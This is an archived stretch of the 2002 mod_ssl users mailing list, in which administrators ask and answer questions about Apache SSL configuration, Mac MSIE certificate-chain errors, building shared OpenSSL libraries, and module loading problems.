>SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+SSLv2:+EXP:+eNULL
>
>And then:
>
>
>        SSLRequire %{SSL_CIPHER_USEKEYSIZE} < 128
>
>
>
>        SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
>
>
>But it doesn't work, any idea why it doesn't work?
>
>Cheers,
>Jeroen.
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 16:21:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA09935; Mon, 19 Aug 2002 16:20:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id QAA09925; Mon, 19 Aug 2002 16:19:32 +0200 (MET DST)
Received: by SOTTMXS01.entrust.com with Internet Mail Service (5.5.2653.19)
	id ; Mon, 19 Aug 2002 10:19:20 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: Apache and MSIE on Macs
Date: Mon, 19 Aug 2002 10:19:19 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2478B.6815CA80"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2478B.6815CA80
Content-Type: text/plain

Hi,

I have an issue where all web browser clients can connect to my Apache web
server securly using https://  EXCEPT for MAC MSIE (5.0 or 5.1 etc..)
clients.

The ssl certificate that I have installed also uses an intermediate
certificate for chaining.

When the MAC MSIE browser connects .. users get a pop up saying .. "The
issuer of the certificate is unknown" however, if you look in the prefs of
MAC MSIE under security, you can clearly see the issuer.

Netscape on the MAC works fine.

Does anyone know the cause?  I know this is Apache and Microsoft related.
There is something on the server that I probably need to change to adapt to
MAC MSIE users but I don't know what it is...

Since I cannot find any articles in the MS KB.. and cannot find any in
Apache newsgroups.. I am lost.

I am Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.0.4pl1



------_=_NextPart_001_01C2478B.6815CA80
Content-Type: text/html






Apache and MSIE on Macs




Hi,




I have an issue where all web browser clients can connect to my Apache web

server securly using https://  EXCEPT for MAC MSIE (5.0 or 5.1 etc..)

clients.




The ssl certificate that I have installed also uses an intermediate

certificate for chaining.




When the MAC MSIE browser connects .. users get a pop up saying .. "The

issuer of the certificate is unknown" however, if you look in the prefs of

MAC MSIE under security, you can clearly see the issuer.




Netscape on the MAC works fine.




Does anyone know the cause?  I know this is Apache and Microsoft related.

There is something on the server that I probably need to change to adapt to

MAC MSIE users but I don't know what it is...




Since I cannot find any articles in the MS KB.. and cannot find any in

Apache newsgroups.. I am lost.




I am Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.0.4pl1







------_=_NextPart_001_01C2478B.6815CA80--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 16:46:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA10608; Mon, 19 Aug 2002 16:45:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA10528; Mon, 19 Aug 2002 16:44:41 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 058B34CE76E; Mon, 19 Aug 2002 16:44:39 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 1C74428854; Mon, 19 Aug 2002 16:39:07 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id NAA06404; Mon, 19 Aug 2002 13:28:45 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g7JBSi71317975;
	Mon, 19 Aug 2002 13:28:44 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa054sz; Mon Aug 19 13:28:38 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id NAA23086;
	Mon, 19 Aug 2002 13:28:30 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id NAA71451;
	Mon, 19 Aug 2002 13:28:37 +0200 (METDST)
Date: Mon, 19 Aug 2002 13:28:37 +0200
From: Thomas Binder 
To: Jeroen Vriesman 
Cc: modssl-users@modssl.org
Subject: Re: Directing users wihtou enough encryption capability
Message-ID: <20020819132837.A11282937@ohm.arago.de>
Mail-Followup-To: Jeroen Vriesman ,
	modssl-users@modssl.org
References: <20020819110208.09068214.jeroen@experian.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20020819110208.09068214.jeroen@experian.nl>; from jeroen@experian.nl on Mon, Aug 19, 2002 at 11:02:08AM +0200
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Mon, Aug 19, 2002 at 11:02:08AM +0200, Jeroen Vriesman wrote:
> I have a site with strong encryption, demanding 128 bit encryption with:
>        SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
> 
> A lot of users don't have browsers with 128 bits encryption
> capabilities, so wat I would to do is:
> 
> When a user cannot use 128 bits encryption, he/she should be
> redirected to a page with info about upgrading, in stead of just
> getting no connection.
> 
> Any idea how to do that?

Use mod_rewrite. I've posted several examples some weeks ago, they
should still be in the list's archive, search for RewriteRule.


Ciao

Thomas


-- 
For a light heart lives long.
		-- Shakespeare, "Love's Labour's Lost"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 18:31:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA13541; Mon, 19 Aug 2002 18:30:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id SAA13450; Mon, 19 Aug 2002 18:29:25 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7585B4CE618; Mon, 19 Aug 2002 18:29:25 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BFE8E285C9; Mon, 19 Aug 2002 18:26:56 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ntexchange.qfa.quinnfable.com id RAA12415; Mon, 19 Aug 2002 17:50:48 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: can't load  /usr/local/apach2/modules/mod_sll.so into server  undefined symbol x509_free 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Date: Mon, 19 Aug 2002 11:50:36 -0400
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Thread-Topic: webdav connection prbl ...
Thread-Index: AcJHl6fguO5wjOxeS9S3IYIaTPAKoQAAFEtC
From: "Venkat Reddy Valluri" 
To: 
Cc: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA12416
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Venkat Reddy Valluri" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
   I installed openssl 0.9.6g engine on redhat 7.3 over which i installed apache 2.0.39, It seems installation to be successful,
   but when i tried to start apache with sll
    ./apachecntl startssl
     iam getiing
       can't load /usr/local/apache2/modules/mod_ssl.so into server /usr/local/apache2/modules/mod_ssl.so

Can you just help me how to install openssl with sharedlibs option
    Any help greatly apprecitated  

Thks in advance
Venkat
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 18:40:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA13785; Mon, 19 Aug 2002 18:39:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pop3.wellinx.com id SAA13774; Mon, 19 Aug 2002 18:38:23 +0200 (MET DST)
Received: from dhcp35.wellinx.com (dhcp35.wellinx.com [172.16.31.35])
	by pop3.wellinx.com (8.9.3/8.9.3) with ESMTP id LAA01781
	for ; Mon, 19 Aug 2002 11:38:05 -0500
X-RAV-AntiVirus: This e-mail has been scanned for viruses on host: pop3.wellinx.com
Subject: Resetting passphrase
From: Ben Ricker 
To: Modssl List 
In-Reply-To: <20020819132837.A11282937@ohm.arago.de>
References: <20020819110208.09068214.jeroen@experian.nl> 
	<20020819132837.A11282937@ohm.arago.de>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8.99 
Date: 19 Aug 2002 11:38:05 -0500
Message-Id: <1029775086.13843.15.camel@dhcp35.wellinx.com>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ben Ricker 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I (stupidly) forgot what my passphrase is for a server cert I have
created using OpenSSL. The cert is certified by verisign. Is there a way
I can reset the passphrase WITHOUT recreating the cert?

Ben Ricker
Wellinx, Inc.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 20:59:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA16719; Mon, 19 Aug 2002 20:58:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA16708; Mon, 19 Aug 2002 20:57:14 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 96E934CE74E; Mon, 19 Aug 2002 20:57:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 475EB28AEF; Mon, 19 Aug 2002 20:50:13 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.projectmw.com id SAA13996; Mon, 19 Aug 2002 18:52:38 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: RE: Directing users wihtou enough encryption capability
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Date: Mon, 19 Aug 2002 12:52:32 -0400
Message-ID: 
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Thread-Topic: Directing users wihtou enough encryption capability
Thread-Index: AcJHj+HJoU7Mzcy3Q4KmkHRpoLhgHwAEGjAg
From: "Philip Ravenscroft" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA13998
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Philip Ravenscroft" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

One way option is along these lines:

ErrorDocument 403 


SSLOptions +StrictRequire
SSLRequire %{SSL_CIPHER_USEKEYSIZE} > 128


> > I have a site with strong encryption, demanding 128 bit 
> encryption with:
> >        SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
> > 
> > A lot of users don't have browsers with 128 bits encryption
> > capabilities, so wat I would to do is:
> > 
> > When a user cannot use 128 bits encryption, he/she should be
> > redirected to a page with info about upgrading, in stead of just
> > getting no connection.
> > 
> > Any idea how to do that?
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 20:59:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA16723; Mon, 19 Aug 2002 20:58:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA16707; Mon, 19 Aug 2002 20:57:13 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 86B144CE73D; Mon, 19 Aug 2002 20:57:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A13C828AEB; Mon, 19 Aug 2002 20:50:11 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id SAA13990; Mon, 19 Aug 2002 18:51:17 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g7JGmcjV001309;
	Mon, 19 Aug 2002 12:48:42 -0400
Date: Mon, 19 Aug 2002 12:48:38 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Venkat Reddy Valluri 
Cc: modssl-users@modssl.org
Subject: RE: can't load /usr/local/apache2/modules/mod_ssl.so
 intoserver/usr/local/apache2/modules/mod_ssl.so undefined symbol x509_free
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 19 Aug 2002, Venkat Reddy Valluri wrote:

> As you told I checked the directory /usr/local/lib for libcrypto.so and
> libssl.so, but I found out only libcrypto.a and libssl.a,
>   can you please let me know how to configure openssl to get these modules
> shared like libcrypto.so and libssl.so

Frankly it's always been a bit of a pain for me.  The default Makefile
doesn't seem to behave quite right.

You can try this:

make build-shared

But then you have to install them by hand because the $(SHARED_LIBS)
variable has no value in the default Makefile so make install doesn't see
them.  Alternatively, you can edit the Makefile as follows:

--- Makefile    2002-03-17 20:03:36.000000000 -0500
+++ Makefile.new        2002-08-19 12:44:49.000000000 -0400
@@ -183,7 +183,7 @@
 LIBS=   libcrypto.a libssl.a
 SHARED_CRYPTO=libcrypto$(SHLIB_EXT)
 SHARED_SSL=libssl$(SHLIB_EXT)
-SHARED_LIBS=
+SHARED_LIBS=libcrypto$(SHLIB_EXT) libssl$(SHLIB_EXT)
 SHARED_LIBS_LINK_EXTS=.so.$(SHLIB_MAJOR) .so

 GENERAL=        Makefile

and then run:

make clean
make
make install

and it should just work.  I think.  Haven't tried it recently.  :)  Let me
know how it goes.  And if anybody else out there knows something about
this that I'm missing (which is possible), please speak up.  :-]

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 20:59:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA16726; Mon, 19 Aug 2002 20:58:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA16703; Mon, 19 Aug 2002 20:57:11 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 66D534CE715; Mon, 19 Aug 2002 20:57:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 7C5BF285C9; Mon, 19 Aug 2002 20:50:21 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nis.acs.uci.edu id TAA15078; Mon, 19 Aug 2002 19:58:08 +0200 (MET DST)
Received: from tesuji.nac.uci.edu (tesuji.nac.uci.edu [128.200.34.35]) by nis.acs.uci.edu (8.9.3/) with ESMTP id KAA12425; Mon, 19 Aug 2002 10:57:59 -0700 (PDT)
Received: (from strombrg@localhost) by tesuji.nac.uci.edu (8.9.3/) id KAA02613; Mon, 19 Aug 2002 10:57:59 -0700
Date: Mon, 19 Aug 2002 10:57:59 -0700
From: Dan Stromberg 
To: modssl-users@modssl.org
Cc: Dan Stromberg 
Subject: Re: cannot load modssl
Message-ID: <20020819105758.N14247@tesuji.nac.uci.edu>
References: <20020815132809.P11151@tesuji.nac.uci.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020815132809.P11151@tesuji.nac.uci.edu>; from strombrg@nis.acs.uci.edu on Thu, Aug 15, 2002 at 01:28:09PM -0700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan Stromberg 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Getting libssl.so to load correctly has revealed a new problem, which I
suppose is likely just a problem in our httpd.conf.

When I start my new httpd, I can retrieve pages on both 80 and 443, but
both only do http, neither does https.  Is there a way to fix this?

Thanks.

On Thu, Aug 15, 2002 at 01:28:09PM -0700, Dan Stromberg wrote:
> I built (tried to build) modssl as a module for apache.
> 
> 
> When I try to run apache, I get:
> 
> decalpha-root> /usr/bin/httpd -d /Web -DSSL                
> Syntax error on line 206 of /Web/conf/httpd.conf:
> Cannot load /dcs/packages/infosys/apache/libexec/libssl.so into server:
> dlopen: cannot load /dcs/packages/infosys/apache/libexec/libssl.so
> 
> 
> A system call trace shows (please pardon me if I didn't get the line
> wrapping undone correctly) :
> 
> mmap ( 0x3004382e000, 4048, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_VA
> RIABLE|MAP_PRIVATE, -1, 0 ) = 0x4382e000
> close (5) = 0
> stat ("/dcs/packages/infosys/apache/libexec/libssl.so", 0x3ffc0001d30) = 0 [ , <
> 129.0.39381905 -rwxr-xr-x 1 dcslib users 221184 1029433580,1029433580,1029433580 > ]
> getrlimit ( RLIMIT_DATA, 0x11fffce48 ) = 0 [ , {134217728,1073741824} ]
> mmap ( 0x3ffc0016000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_VA
> RIABLE|MAP_PRIVATE, -1, 0 ) = 0xffffffffc0016000
> open ("/dcs/packages/MySQL/lib/mysql/libssl.so", O_RDONLY, 30000211552) = -1, Er
> rno 2 (No such file or directory)
> open ("/dcs/packages/infosys/php-ext/pdflib/lib/libssl.so", O_RDONLY, 3000021155
> 7) = -1, Errno 2 (No such file or directory)
> open ("/dcs/packages/infosys/php-ext/freetds-0.53/lib/libssl.so", O_RDONLY, 3000
> 0211551) = -1, Errno 2 (No such file or directory)
> open ("/dcs/packages/perl-5.6.0/lib/5.6.0/alpha-dec_osf/CORE/libssl.so", O_RDONL
> Y, 30000211552) = -1, Errno 2 (No such file or directory)
> 
> 
> /dcs/packages/infosys/apache/libexec/libssl.so is indeed where the SO in
> question lives.
> 
> 
> Also:
> 
> decalpha-root> file /dcs/packages/infosys/apache/libexec/libssl.so
> /dcs/packages/infosys/apache/libexec/libssl.so: COFF format alpha shared
> library, demand paged executable or object module stripped - version
> 3.11-10 
> 
> 
> I'm using apache 1.3.26, mod_ssl 2.8.10-1.3.26, and openssl 0.9.6e.
> 
> 
> mod_ssl was ./configured with:
> 
> ./configure --with-apache=/dcslibsrc/infosys/apache-httpd/apache/`systype` \
>   --prefix=/dcs/packages/infosys/apache-$vers \
>   --with-ssl=/dcs/packages/openssl
> 
> 
> The OS I'm on is Tru64 4.0D, but I hope to run the resulting binary on a
> variety of more recent Tru64 machines.
> 
> 
> I'm not getting a core dump, in fact httpd doesn't even start.  I just
> get the error mentioned above.
> 
> 
> The daemon runs fine without -DSSL.
> 
> 
> As probably happens too often on this list, this matter is rather urgent
> for us.
> 
> 
> Thanks.
> 
> -- 
> Dan Stromberg                                               UCI/NACS/DCS



-- 
Dan Stromberg                                               UCI/NACS/DCS
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 20:59:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA16729; Mon, 19 Aug 2002 20:58:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA16702; Mon, 19 Aug 2002 20:57:11 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 535A14CE61C; Mon, 19 Aug 2002 20:57:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 55E0928AF5; Mon, 19 Aug 2002 20:50:18 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nis.acs.uci.edu id TAA15056; Mon, 19 Aug 2002 19:56:15 +0200 (MET DST)
Received: from tesuji.nac.uci.edu (tesuji.nac.uci.edu [128.200.34.35]) by nis.acs.uci.edu (8.9.3/) with ESMTP id KAA12411; Mon, 19 Aug 2002 10:56:05 -0700 (PDT)
Received: (from strombrg@localhost) by tesuji.nac.uci.edu (8.9.3/) id KAA02607; Mon, 19 Aug 2002 10:56:05 -0700
Date: Mon, 19 Aug 2002 10:56:05 -0700
From: Dan Stromberg 
To: modssl-users@modssl.org
Cc: Dan Stromberg 
Subject: Re: cannot load modssl
Message-ID: <20020819105604.M14247@tesuji.nac.uci.edu>
References: <20020815132809.P11151@tesuji.nac.uci.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: <20020815132809.P11151@tesuji.nac.uci.edu>; from strombrg@nis.acs.uci.edu on Thu, Aug 15, 2002 at 01:28:09PM -0700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dan Stromberg 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I ran into the same problem on Solaris.

If I change the ssl module's SSL_LDFLAGS to "-L$(SSL_LIBDIR)
-R$(SSL_LIBDIR)", then it works - the -R was missing.  I now suspect
this was the same problem I was seeing on tru64, where it would instead
be -Wl,-rpath -Wl,/dir/ect/ory .

I now have two questions directly related to this:

1) What is the right place to add this?  I imagine it's not the most
pleasing of methods to manually add this to the Makefile after
configure'ing, which unfortunately is what I've done to get the ssl
module to work (sort of, see below).

2) Can something like this be added to the Makefile?  Or am I really the
only person in the world who doesn't put openssl in a standard place
like /usr/lib or /usr/local/lib?  It seems to me that libtool or
something should be taking care of this the most thorough way, instead
of assuming the openssl libraries are on your run-time loader path.

Thanks.

On Thu, Aug 15, 2002 at 01:28:09PM -0700, Dan Stromberg wrote:
> I built (tried to build) modssl as a module for apache.
> 
> 
> When I try to run apache, I get:
> 
> decalpha-root> /usr/bin/httpd -d /Web -DSSL                
> Syntax error on line 206 of /Web/conf/httpd.conf:
> Cannot load /dcs/packages/infosys/apache/libexec/libssl.so into server:
> dlopen: cannot load /dcs/packages/infosys/apache/libexec/libssl.so
> 
> 
> A system call trace shows (please pardon me if I didn't get the line
> wrapping undone correctly) :
> 
> mmap ( 0x3004382e000, 4048, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_VA
> RIABLE|MAP_PRIVATE, -1, 0 ) = 0x4382e000
> close (5) = 0
> stat ("/dcs/packages/infosys/apache/libexec/libssl.so", 0x3ffc0001d30) = 0 [ , <
> 129.0.39381905 -rwxr-xr-x 1 dcslib users 221184 1029433580,1029433580,1029433580 > ]
> getrlimit ( RLIMIT_DATA, 0x11fffce48 ) = 0 [ , {134217728,1073741824} ]
> mmap ( 0x3ffc0016000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_VA
> RIABLE|MAP_PRIVATE, -1, 0 ) = 0xffffffffc0016000
> open ("/dcs/packages/MySQL/lib/mysql/libssl.so", O_RDONLY, 30000211552) = -1, Er
> rno 2 (No such file or directory)
> open ("/dcs/packages/infosys/php-ext/pdflib/lib/libssl.so", O_RDONLY, 3000021155
> 7) = -1, Errno 2 (No such file or directory)
> open ("/dcs/packages/infosys/php-ext/freetds-0.53/lib/libssl.so", O_RDONLY, 3000
> 0211551) = -1, Errno 2 (No such file or directory)
> open ("/dcs/packages/perl-5.6.0/lib/5.6.0/alpha-dec_osf/CORE/libssl.so", O_RDONL
> Y, 30000211552) = -1, Errno 2 (No such file or directory)
> 
> 
> /dcs/packages/infosys/apache/libexec/libssl.so is indeed where the SO in
> question lives.
> 
> 
> Also:
> 
> decalpha-root> file /dcs/packages/infosys/apache/libexec/libssl.so
> /dcs/packages/infosys/apache/libexec/libssl.so: COFF format alpha shared
> library, demand paged executable or object module stripped - version
> 3.11-10 
> 
> 
> I'm using apache 1.3.26, mod_ssl 2.8.10-1.3.26, and openssl 0.9.6e.
> 
> 
> mod_ssl was ./configured with:
> 
> ./configure --with-apache=/dcslibsrc/infosys/apache-httpd/apache/`systype` \
>   --prefix=/dcs/packages/infosys/apache-$vers \
>   --with-ssl=/dcs/packages/openssl
> 
> 
> The OS I'm on is Tru64 4.0D, but I hope to run the resulting binary on a
> variety of more recent Tru64 machines.
> 
> 
> I'm not getting a core dump, in fact httpd doesn't even start.  I just
> get the error mentioned above.
> 
> 
> The daemon runs fine without -DSSL.
> 
> 
> As probably happens too often on this list, this matter is rather urgent
> for us.
> 
> 
> Thanks.
> 
> -- 
> Dan Stromberg                                               UCI/NACS/DCS



-- 
Dan Stromberg                                               UCI/NACS/DCS
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 19 21:07:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA17266; Mon, 19 Aug 2002 21:06:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12903.mail.yahoo.com id VAA17257; Mon, 19 Aug 2002 21:05:46 +0200 (MET DST)
Message-ID: <20020819190543.21124.qmail@web12903.mail.yahoo.com>
Received: from [209.247.163.9] by web12903.mail.yahoo.com via HTTP; Mon, 19 Aug 2002 12:05:43 PDT
Date: Mon, 19 Aug 2002 12:05:43 -0700 (PDT)
From: Joshua Stone 
Subject: Pls help
To: modssl-users@modssl.org
In-Reply-To: <20020816010604.8330.qmail@web12902.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joshua Stone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Any help on this will be highly appreciated...thanx.

> Hi there,
> 
> I've a linux box running -
> 
> Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d 
> 
> The box gets extremely loaded when I have -
> 
> ...
> SSLRandomSeed startup buildin
> SSLRandomSeed connect buildin
> ...
> 
> in httpd.conf file. As soon as I change the connect
> line with
> 
> SSLRandomSeed connect file:/dev/urandom 1024
> 
> everything seems fine.
> 
> Any idea what was causing the server busy? 
> 
> Thanx
> -
> Jays.
> 
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org


__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 20 06:05:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA28092; Tue, 20 Aug 2002 06:04:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id GAA28086; Tue, 20 Aug 2002 06:03:44 +0200 (MET DST)
Received: (qmail 10897 invoked from network); 20 Aug 2002 16:04:44 +1200
Received: from unknown (HELO thoth.trimble.co.nz) (155.63.248.21)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 20 Aug 2002 16:04:44 +1200
Received: (qmail 13109 invoked by uid 403); 20 Aug 2002 16:03:36 +1200
Received: from jhaar@trimble.co.nz by thoth.trimble.co.nz by uid 400 with qmail-scanner-1.14 
 (trophie: 5.500-0829/335/46837. sophie: 2.10/3.59. spamassassin: 2.31.  Clear:. 
 Processed in 0.074781 secs); 20 Aug 2002 04:03:36 -0000
Received: from crom.trimble.co.nz (10.3.0.198)
  by thoth.trimble.co.nz with SMTP; 20 Aug 2002 16:03:35 +1200
